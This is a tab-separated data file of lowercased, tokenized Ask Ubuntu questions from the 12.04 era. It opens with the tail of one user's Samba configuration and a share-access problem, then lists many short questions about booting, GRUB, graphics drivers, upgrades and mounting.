option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home directory as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes ; share modes = no # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ office ] path = /srv/samba/office comment = test for projects valid users = @ sambashare writeable = yes browsable = yes force group = sambashare create mask = 0766 [ public ] path = /srv/samba/public comment = test public writeable = yes guest ok = yes forcegroup = sambashare create mask = 0766 which seems fine to me ( correct me if i 'm wrong , please ! ) testparm brings the following output : load smb config files from /etc/samba/smb.conf rlimit_max : rlimit_max ( 1024 ) below minimum windows limit ( 16384 ) processing section `` [ printers ] '' processing section `` [ print $ ] '' processing section `` [ office ] '' processing section `` [ public ] '' loaded services file ok. server role : role_standalone press enter to see a dump of your service definitions [ global ] server string = % h server ( samba , ubuntu ) map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes browseable = no browsable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers [ office ] comment = test projects path = /srv/samba/office valid users = @ sambashare force group = sambashare read only = no create mask = 0766 [ public ] comment = test public path = /srv/samba/public force group = sambashare read only = no create mask = 0766 guest ok = yes so far , so good ! i 'm able to see the folders , i 'm able to access the 'public ' folder , but i ca n't get any grip on the 'office ' folder . all login attempts are denied ( username and password are correct ! i rechecked them more than 5 times ) . do you guys have any hint/advice/solution for my problem ? would be glad for any help ! ! thanks in advance if you 've read this far - i appreciate it a lot ; )
125348	why is ubuntu 12.04 recommended in 32 bit version ?	i have heard somewhere that since ubuntu 12.04 canonical will recommend to download the 64bit version , and not 32 , as it used to be . however , the ubuntu website downloads 32bit version by default . why was that decision changed ?
125350	no keyboard layout switch after reboot	since the `` applications - > settings - > xfce settings manager - > keyboard '' dialogue does not allow to assign a new key for the `` change keyboard layout '' action , i have added a `` keyboard layouts '' plugin to the upper panel ( near the clock ) . it lets me to assign caps lock to the change layout action . but unfortunately , each time after i reboot , the following happens : the `` keyboard layouts '' applet disappears from the upper panel ; i can not use caps lock to change the layouts on the keyboard anymore . how can it be fixed ? p.s . my system is xubuntu 10.04 lts , 2.6.32-40-generic
125351	uninstall ubuntu ? help !	i have read most articles on removal but to no avail ! i can not raise windows 7 in the start-up , it goes straight in ubuntu . i have tried most techiques like , the f8 , del button etc . on start-up . i can not also raise systems > administration etc . the only thing i can think of is get a windows 7 system repair disc and boot up with that ? : -/ nigel
125352	fresh install of ubuntu 12.04 amd64 does not boot	can not boot fresh installation of 64-bit ubuntu 12.04 . got next message right after reboot : error : invalid arch independent elf magic . grub rescue > what is wrong ? how can i fix it without reinstall ?
125353	how do i put a gnome-terminal 's left border on the left side of screen , using a shell command ?	i 'm making a custom command that launches gnome-terminal as a sort of overlay window near the bottom of the screen , similar to the tilda terminal . in order to do this , i 'm using gnome-terminal 's -- geometry argument , which uses the x geometry specification . however , i 'm unable to place the left border on the window near the left edge of the screen . when i supply the +xoff value , it 's positioned relative to the right edge of the unity launcher bar . if i make the +xoff value negative , it still wo n't place the left border further to the left . if i use a -xoff value , the right border of the window is positioned outside the screen instead of putting the left border of the window closer to the left side of the screen . so here 's my question , how can i put the left edge of the window at the left edge of the screen using a shell command ? i 'm using ubuntu 11.10 if it 's relevant .
125354	python , gtk3 and gstreamer	this is n't a really happy combination , but it does work for the most of the time . however , i just bumped into a problem with gio.file . this will always result in typeerror and python segfaulting : python 2.7.3 ( default , apr 10 2012 , 12:29:04 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > from gi.repository import gobject , gio > > > import gst > > > la = gio.file.new_for_path ( `` /home/dklasinc/foo '' ) typeerror : metaclass conflict : the metaclass of a derived class must be a ( non-strict ) subclass of the metaclasses of all its bases error : /build/buildd/pygobject-3.2.0/gi/_gobject/pygobject.c:929 : pygobject_new_full : assertion failed : ( tp ! = null ) is there a way around this ? i 'd like to use gio for file copy operations so that i can provide users with some feedback .
125357	chrome puts itself on startup applications	i do n't know if this happened with oneiric , but since i installed precise i have noticed that google chrome put itself on my startup applications and processes like `` chrome-no-startup-window '' , `` chrome-sandbox '' , `` chrome-sandbox '' , `` chrome-type-zygote '' , etc . keep on running on the background . if i remove chrome from my startup applications , it will show back next time i start the computer . how can i get chrome to stop misbehaving like this ?
125363	unity-team 404 error after upgrading to 12.04	i upgraded from beta 2 to 12.04 final using the command sudo apt-get update & & sudo apt-get upgrade it appears everything upgraded except i get the following error message at the end . w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what does it mean and how do i proceed to fix it ?
125367	enabling mic mute button and light on lenovo thinkpads	i have a mic mute button on my lenovo thinkpad t420 , but it does n't work . so i tried xev command to monitor press event , and that key was n't captured . is there anyway to fix it , like add raw key code ? os & laptop ubuntu 12.04 , also hope it works on arch linux , but does n't matter much ; -p thinkpad module : x220 4290ly9 kernel patch for arch linux download here finally it 's a little tricky , but with the kernel patch and acpid script , it works now . the rest i need is a notify daemon like the one for output mute , but it does n't matter much now .
125371	ca n't visit www.ubuntu.com ?	i ca n't download ubuntu 12.04 may be due to the traffic right now . can someone please provide a link for ubuntu 12.04 intel 32bit desktop iso official torrent ?
125372	how to mount nas folders via direct wired connection ?	there are two machines connected to each other via network cable . one is notebook ubuntu 12.04 . another is nas western digital with a debian . the nas has some files shared via samba . i am not sure how it is called but under windows these files are accessible via path \mybooklive\public . i know there is nfs - probably it is preferable over samba ... so , how to get my files accessible from ubuntu when a cable is plugged ?
125376	how to change latexilas standard dictionary	i 'm using latexila as tex environment and whenever i open a tex file , i have to switch the dictionary for spell checking purposes to en_gb ( default dictionary in latexila is de_de and i 'm using the german language on my ubuntu system ) . unfortunately , i did n't find a possibility in latexila to change the standard dictionary . i guess that latexila is looking for the default dictionary of the user . is there a possibility to set the default dictionary to en_gb ?
125379	ubuntu 11.10 gives black screen on boot	i 've been having a problem with ubuntu 11.10 . i 've tried installing it using wubi , a usb stick , and a traditional install cd , but no matter what method i use , as soon as the grub screen disappears my screen goes blank . the backlight even turns off . i 'm on a dell vostro desktop , using nvidia optimus graphics ( it 's a prototype ) . most of the answers i 've found elsewhere suggest installing drivers , but i ca n't do that because the system never boots . this is a constant issue , by the way . i have yet to get even as far as the login screen . i know that my install image is n't corrupted , as i tested it on my laptop and it worked perfectly . any help anyone can offer would be appreciated .
125380	help i 've overwritten my /home/user directory	i have stupidly mounted /dev/loop0 in two places - it is mounted on / and on /home/user is it possible to unmount this and restore the folders in my /home/user folder ? i ca n't even access the internet since the pathnames are no longer the same so i am on a different computer i.e . icons in the unity dock ca n't be accessed so i cant run any programs . have i destroyed my files ?
125383	how do i stop a distribution upgrade from upgrading php ?	i have just upgraded my ubuntu server to 12.04 - it was completed with just one `` problem '' . php has been reinstalled to 5.3.10 from ubuntu 's repos . and i wanted to keep my php package from dotdeb.org . before i start with upgrade my second server , is there any way to disable php upgrade ?
125385	is there a way to make a mounted gvfs volume shortcut on the desktop or home folder ?	i have a network drive and i want to make it accessible to apps , such as liberoffice . i can not make a link . the drive is available under .gvfs . is there a way to have it as a link in my desktop or home folder ?
125387	from ubuntu 12.04 beta2 upgrade to 12.04	help ! please i why not , i go to the update center and i find not .
125389	trustworthy p2p solution to accelerate apt-get dist-upgrade	do you know any good and working solution for making apt-get dist-ugprade faster ? i remember trying out apt-p2p a while ago but it was not wokring well . thanks !
125390	launcher and top panel removing	i kindly ask to help about removing launcer , but not in way to have classic panel . i want to remove launcher and top panel and put shortcut at the desktop . please help .
125392	why is `` no new release found '' when upgrading from a lts to the next ?	i 'm following the upgrade instructions on ubuntu 's website , but on launching the upgrade tool i get this response : checking for a new ubuntu release no new release found am i doing something wrong ? is there a workaround ? here 's my /etc/lsb-release : distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.4 lts ''
125394	12.04 on mac mini 4,1 ?	is ubuntu 12.04 usable on mac mini 4,1 machines ? the ubuntu mactel support pages seems to be rather out of date ( they list 10.04 as the latest supported , but 11.10 runs just fine ) .
125395	no upgrade option when booting from usb ( 12.04 )	i am trying to upgrade my ubuntu 11.10 , i know that it is better to upgrade using a live cd/usb , i booted from the live usb , followed the instructions as usual , but only found three options : cleen install install alongside your other operating systems other the upgrade choice was missing . i even tried installing it after running ubuntu 12.04 from usb , and ended up with the same result . i have a dual boot ubuntu 11.10 and windows 7 , i think it is only seeing the windows 7 and missing the ubuntu 11.10 partition . any help ?
125397	can i keep my desktop settings exactly as they are now if i upgrade ?	i have severe ocd and would like some help regarding changes to my desktop if i upgrade from ubuntu 11.10 to 12.04 . i use the gnome classic ( no effects ) desktop . the desktop has nothing on it - it is black and i have changed the top panel to black as i like things to be clear and the gnome icon within the panel appears only when i move my arrow to the top left of the screen ( because i have hidden it ) which is perfect for me . now , i see that the new release includes the gnome classic desktop - will those settings i have described above be kept in the new release as i do n't want to go through these things again because of my condition . please give me any advice as this is important to me .
125398	dynamic proxy with password	i need to setup a proxy on my localbox to redirect some requests to another network . i am doing it in the following way ssh -f -n -d 0.0.0.0:22022 some-external-host in this case every time i try run this command in script it is always asks for a password , is it possible to pass a password to this command programatically and not to type it every time i run this script ? public keys is not an option for me .
125402	auto start disk formatting when entering wrong password	i 'm thinking of way to protect data from stealing . is there any way to start auto disk formatting when someone enters wrong password on login ? or when enters specific password which would trigger disk formatting ?
125403	enable agenda in the calendar widget	when i click the date widget in the top bar , the calendar pops up . in the calendar , you can click to select a day . the day will be highlighted question : how to add an event and eventually have reminders ?
125408	mounting nfs synchronously on boot	i 've added the following line to my /etc/fstab : server : /srv/homes /home nfs rsize=8192 , wsize=8192 , timeo=14 , intr , hard , auto 0 0 as you can see , /home needs to be mounted during the boot or users wo n't have an access to their home directory . unfortuately , ubuntu seems to push mounting to the background and therefore /home is mounted approximately one minute after login screen appears . how can i make it wait for successful mount ? ps . i 'm running ubuntu 12.04
125409	how are separate x screens supposed to work ( probable problem )	i just recently re-installed ubuntu ( went from 11.10 32bit to 11.10 64bit ) and got a new monitor and video card ( nvidia , vga and hdmi outputs ) . so , since i have two monitors connected to the computer , i decided to try the different multi-view setups ( twinview and separate x screens ) . twinview works fine , but is n't what i want to use right now . however , when trying to setup separate x screens ( from nvidia-settings ) , when i logout/login it does set it up , but the following problems occurr : when i login , the second display ( display/monitor 1 ) shows the desktop for a split second and then goes completely white . i did some research and found that this is caused by nautilus , which , if killed , shows the desktop in the second display again ( which it does , but the white screen comes back as soon as i open up another program [ such as nautilus or gedit ] , also there is no toolbar in the second screen ) . the second screen seems to be almost completely non-interactive . i say almost as there are two things i can do ( though not very helpful ) : if i right-click it gets rid of the white background , but does not bring up a menu ( nor do further right-clicks accomplish anything ) . also , if i force a program to open in the second screen ( via opening a terminal and running a command in the first screen , such as gedit -- display :0.1 ) i can do nothing with the program ( not even type , as that just puts characters in the terminal in the first screen ) , save for clicking on the buttons that are in the gui . the mouse cursor is an x in the second screen ( and sometimes in the first screen if i try to do too much interaction with the second screen ) . which is n't that bad , but it seems kind of weird . if i lock my screen ( via cntrl+alt+l ) or if the screen times out and locks itself , if i try to get back in , the screens come on but remain completely blank . so i was wondering , is this how separate x screens are supposed to work ( sort of a stupid question i guess ) ? i 'm guessing not , but , since i do n't know how they are supposed to work , i ca n't really tell when they are working correctly . if they are functioning improperly , does anyone know of a way to fix it ( as i would like separate x screens far more than twinview at the moment [ if they work the way i think they do ] ) ? thanks !
125410	how can i configure the colour of the dash ?	the new ubuntu uses ugly colours merged out of my wallpaper . how can i turn this off , so it 's just the darker version of the background ( like in 11.10 ) ?
125412	md5 mismatch on my 12.04 iso , what is going on ?	i downloaded ubuntu-12.04-desktop-amd64.iso from http : //releases.ubuntu.com/precise/ this page also has a link to file showing the respective md5 hashes for each file the page shows 128f0c16f4734c420b0185a492d92e52 *ubuntu-12.04-desktop-amd64.iso but when i checked my downloaded iso using the md5sum program i get 57876b3740ee89e75c8fefc93a7ceee6 *ubuntu-12.04-desktop-amd64.iso i also downloaded the iso via bittorrent using http : //releases.ubuntu.com/precise/ubuntu-12.04-desktop-amd64.iso.torrent this time using md5sum for this file shows the correct hash 128f0c16f4734c420b0185a492d92e52 , but the iso is 732mb , not 698mb as shown on the release page . what could be happening here ?
125414	how to read files recovored by scalpel ?	i used scalpel to recover some deleted jpg files . now i have files which look like this : jpg-1-21 , jpg-1-22 etc ... but do n't know how to open them . i tried with image viewer , but it says there 's no image file .
125417	touchpad not detected via evtest on a samsung 300v5a series 3	having to use usb mouse , another release and another major bug.. samsung 300v5 , appeared in default 12.04 install
125421	how to open ~/.pam_environment ?	i wanted to set environment variables java_home and path . so i wanted to open ~/.pam_environment since it is the best place to set environment variables relevant to a particular user according to the link https : //help.ubuntu.com/community/environmentvariables . the link states : session-wide environment variables environment variable settings that should affect just a particular user ( rather then the > system as a whole ) should be set into : ~/.pam_environment - this file is specifically meant for setting a user 's environment . it is not a script file , but rather consists of assignment expressions , one per line . the problem i have is that i am not able to open the file ~/.pam_environment by using the command gedit ~/.pam_environment . i do not know whether this is the right way to open this file , please point me in the right direction .
125424	how to add 100gb from windows 7 to ubuntu ?	windows 7 has way too much free space , is it possible to get 100gb from windows7 and give it to ubuntu ? thank you .
125428	grub complains of `` no such partition '' after installing 12:04	i have just installed 12.04 . i previously had 11.10 installed , with /dev/sda6 as the install partition mounted at / and with /dev/sda1 mounted at /home . when installing 12.04 , i duly selected the same options , with no reformatting . i selected /dev/sda6 as the bootloader partition . i was warned , as expected , that the system files on /dev/sda6 would be deleted . after reinstalling , i ca n't get past grub : selecting the main boot option , or the recovery mode option , both give me the error `` no such partition '' , and the option to go back to the main grub screen . what 's going on here ? what partition is it saying does n't exist ? and obviously , how do i fix this ? edit 1 : i get the error three times ; it looks like : error : no such partition . error : no such partition . error : no such partition . press any key to continue ... this also happens with the `` memory test '' boot options . entering the command line and running ls gives me the same error .
125432	does ubuntu 12.04 livecd run unity 2d or 3d or selects which one to run adaptively ?	in case i boot from an ubuntu 12.04 livecd , am i going to see unity 2d , standard unity ( `` 3d '' ) or does it depend on my hardware ?
125434	my /home is not mounted after 12.04 upgrade	i upgraded from 11.10 to 12.04 after finishing the upgrade when i rebooted the pc i get unable to mount /home press m or s i tried m then mount -a but it does not work in fstab i have # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=0d271cd9-4a95-4680-abd3-435bcad5eda4 / ext4 errors=remount-ro 0 1 /dev/sda5 /home ext4 defaults 0 2 /dev/sda1 none swap filesystem size used avail use % mounted on /dev/sdb3 28g 11g 16g 40 % / udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 1.6g 1.2m 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 164k 3.9g 1 % /run/shm none 3.9g 57m 3.9g 2 % /tmp/guest-k9fc5n /dev/sdb5 416g 256g 140g 65 % /media/29990594-2993-429b-a4e0-7ed7c6c26966 /dev/sda1 1.9t 1.3t 575g 70 % /media/sauvegarde /dev/sdc1 597g 517g 80g 87 % /media/serie /dev/sdd1 233g 117g 117g 51 % /media/409423eb9423e260 sw 0 0 while /dev/sdb5 should be the /home any i dea ? /dev/sda6 none swap sw 0 0 and in df -h
125435	why this error `` can not update from precise to oneiric with this tool '' .	it says that it ca n't upgrade from 11.10 to 12.04 in the update manager , so how can i force it ? the error message given why i try it is `` can not update from precise to oneiric with this tool '' .
125439	making ubuntu 11.10 bare bones	i was wanting to make ubuntu bare bones , i.e . with no glitter and zitter so that it becomes highly responsive and quick to boot up . i heard gnome is one thing which can make the os less responsive , but are there less `` system intensive '' version which i can revert back to . rather than trying another faster os i want to try and make ubuntu faster , which would work out great . digvijay
125443	how can i get my intel 82945g/gz video card to support more resolutions ?	i 've just installed ubuntu 12.04 , the screen resolution is stuck at 1920x1280.everything appears big , its not comfortable to look at . there is no such option about screen resolution . i got into the displays setting . i 've only 2 screen resolutions 1024x800,800x600.how can i add 1280x800 or other such resolutions ? lspci shows this : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82945g/gz integrated graphics controller [ 8086:2772 ] ( rev 02 ) this is what i got after checking for drivers :
125450	any advantage or disadvantage to using the command line vs the graphical update process using update manager ?	11.10 to 12.04 upgrade : my natural inclination is to go for the command line update method using : do-release-upgrade any advantage or disadvantage to using the command line vs the graphical update process using update manager ? ubuntu 's website recommends using update manager but i suspect this may be due to many user 's aversion to using the command line .
125451	new system - compatibile hardware	i am planning to get new system and assemble myself . need your input in building new machine . please let me know , which company 's product will work with ubuntu ( i know , it works with almost all of them out of the box ) . but still needs your input on this . graphic card web camera ( which works with gtalk ) thanks & regards , anand
125453	how do i fix `` your system is running in low-graphics mode '' ?	i installed 12.04 lts ( upgraded from 11.10 ) but when i start my computer it shows your system is running in low-graphics mode , your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . and then shows a dialog to choose , what i want to do , but this one does n't work correctly . so i can access only terminal but i do n't know how to set this stuff or how to start gui . because i 'm terminal kiddies : - )
125455	12.04 liveusb does n't upgrade for 10.04 installation ?	i burnt ubuntu to usb and when i try to install it , it does n't allow me to upgrade to 12.04 , it allows just to install it alongside . why ?
125460	ca n't set proper resolution with a geforce 520	i installed the 12.04 lts but can not get my two monitors working . the latest nvidia-current drivers installed , but i just cant set proper resolution . my card is a geforce 520 1 dvi 1 vga . with the nvidia drivers installed i can set the dvi monitor to 1600x1200 but the vga no further than 1360x768 ( with nvidia-settings ) . without the nvidia driver ( using the nouveau ) it does n't work either . this same issue i had with 11.10 and i had high hopes for 12.04 .
125463	ca n't set resolution to 1366x768 in ubuntu after crash	i was using ubuntu normally when the x system restarted by itself , taking me back to lightdm . after this event i ca n't get the full resolution of my screen back . does anyone have an idea what 's going on ? here 's my lscpi output : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:16.3 serial controller : intel corporation 5 series/3400 series chipset kt controller ( rev 06 ) 00:19.0 ethernet controller : intel corporation 82578dm gigabit network connection ( rev 05 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1c.6 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 7 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 05 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) i do n't have any clue what happened . i was n't installing anything or messing with configs ... i found out that the many others are having problems with ubuntu and the i915 driver , which is also the one my video card uses : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 304a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 43 region 0 : memory at f0000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 1170 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- address : fee0c00c data : 4181 capabilities : [ d0 ] power management version 2 flags : pmeclk- dsi+ d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ a4 ] pci advanced features afcap : tp+ flr+ afctrl : flr- afstatus : tp- kernel driver in use : i915 kernel modules : i915 it 's apparently not yet solved .
125464	error authenticating some adobe packages , how to proceed ?	getting the following message : error authenticating some packages this is the list of packages : acroread acroread-common adobe-flash-properties-gtk adobe-flashplugin
125465	i believe grub has become corrupted on my computer	i believe grub has accidentally become corrupted on my computer/laptop - when i turn it on , and try to boot into ubuntu , grub gives me the error message : error : unknown file system grub rescue > does anyone know how to fix this problem ?
125466	how do i install and run lord of the rings online on a 64-bit ubuntu system ?	has anyone found the secrets to installing and running lord of the rings online on an ubuntu 11.10 64bit system ?
125468	how can i get the source code to gnome-system-monitor and use it in my application ?	i want to create a system monitor quite similar to gnome-system-monitor in ubuntu using python . i have used quickly application for the gui and now i want to show the cpu history as shown by the system monitor , i want to know where i can get the source code to the system monitor and how to use it in my application .
125471	can not change brightness on an acer aspire 5745-dg	i have an acer aspire 5745dg laptop and i have also a very serious problem ! ! my brightness is always at maximun and i can not change it with the fn keys or from the power management and my battery discharging fast : / . thats my problem and i need your help guys ! ! ! ! in my windows partition brightness works perfectly only in ubuntu i have this serious and annoying problem ! ! ! ! please reply to my message i 'd appreciate that !
125473	logitech dinovo edge does not work in 12.04	my logitech dinovo edge does n't work at all in ubuntu 12.04 . there is no driver available . i worked in 10.04 , 10.10 and 11.10 . what to do ?
125474	disable periodic wifi-scan in networkmanager	i have a problem with the kde-networkmanager . i want to stream pulseaudio via wlan . everything works fine , but my problem is that the connection is interrupted every 30 seconds . i found out , that this happens because the networkmanager ( re ) scans for available wifis . i tried to use wicd , but i have problems connecting to my college-network with it . has anyone an idea , how to disable the automatic ( re ) scan of kde 's network manager ?
125477	how to download 12.04 with resume option ?	i would like to download latest ubuntu 12.04 lts . but , i have a lousy connectivity . is there torrent-like download available which i can pause and resume ?
125478	unusable desktops settings with nvidia	i am owner of nvidia geforce gt 320m and i have two displays : external montior benq 1920x1080 and laptop 's display 1366x768 . ubuntu with installed additional hardware drivers recognize my monitors just as a single monitor : similar behavior occurred also on 11.10 but displays dialog was n't so important as it is in 12.04 : sticky edges make it painful to move the cursor from one display to another when saving a change in displays dialog or during log in , the following error is displayed : displays dialog worked during the installation perfectly . i assume that the problem are nvidia drivers . output of xrandr : $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 3286 x 1080 , current 3286 x 1080 , maximum 3286 x 1080 default connected 3286x1080+0+0 0mm x 0mm 3286x1080 50.0* my questions are : how to turn off sticky edges ? how to get rid of that dialog after every login ? are there any alternative drivers which play well with display dialog ? how to get rid of nvidia drivers ? i could only choose from version current and post-release updates :
